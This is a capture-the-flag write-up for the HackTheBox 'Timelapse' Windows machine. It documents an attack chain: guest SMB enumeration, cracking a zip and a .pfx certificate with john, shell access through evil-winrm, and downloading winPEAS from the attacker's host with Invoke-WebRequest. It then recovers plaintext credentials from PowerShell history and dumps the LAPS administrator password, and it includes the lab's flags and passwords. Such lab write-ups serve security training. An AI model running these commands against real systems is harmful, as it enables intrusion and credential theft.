--- title: "Writeup - Timelapse (HTB)" date: 2022-04-03 slug: "writeup-timelapse-htb" type: "writeup-ctf" --- This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV -T4 -Pn 10.129.188.205 ``` Many TCP ports are discovered: ![](img/image-1.webp) - 22/tcp : SSH port (OpenSSH 8.2) - 80/tcp : HTTP web server (Apache 2.4.41) ## Exploit First I start by listing the SMB shares with the `guest` account: ```bash enum4linux -a -u "guest" -p "" 10.129.188.205 ``` ![](img/image-2.webp) The `Shares` folder is available for reading, let's see what we can find in it: ![](img/image-3.webp) We find two folders, in one of the two folders we find the file `winrm_backup.zip`, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command: ```bash zip2john winrm_backup.zip > hash ``` Then I launch the dictionary attack with john with the rockyou dictionary: ![](img/image-4.webp) Quickly I find that the password is `supremelagacy`. So now I can unpack the archive. In this archive I find a file with the extension `.pfx`. These files are used by windows to store certificates in `PKCS#12` format. From this file we have the possibility to retrieve the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands: ```bash openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt ``` Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command: ```bash pfx2john legacyy_dev_auth.pfx > hashbis ``` Then I launch the dictionary attack with john : ![](img/image-5.webp) I find the password `thuglegacy`, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use `evil-winrm` with the following command: ```bash evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u ``` ![](img/image-6.webp) I now have a shell with the `legacyy` user and I can get the first flag. ```bash *Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt 6a29afecacdabd66d286759e1f1379ff ``` ## Privilege escalation For the elevation of privilege I start by uploding winPEAS then I execute it : ```bash powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe" ./winPEASx64.exe ``` In the result of the program, I find that a file containing a command history exists on the machine: ![](img/image-7.webp) I get it on my machine with the following command: ```bash download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` ```bash whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit ``` Looking at the contents of the file I find a user and his password! Another thing that winPEAS teaches me is that the user svc\_deploy has the right to read the LAPS passwords attribute! > The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset. So I try to do it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command: ```bash ┌──(d3vyce㉿kali)-[~/Documents] └─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb DC01$:J3V}8QBsB4Q6+jgveai$7}}M ``` The script finds the administrator password of the machine! I can now connect with the following command: ```bash evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M' ``` ![](img/image-8.webp) I now have a shell as Administrator and I can retrieve the last flag. ```powershell *Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt 09cec1f63345aa18fcf4bd05b9be6714 ``` ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Do not allow SMB shares containing important files to be accessed by unidentified users - Do not use weak passwords to protect certificates - Do not leave files with clear passwords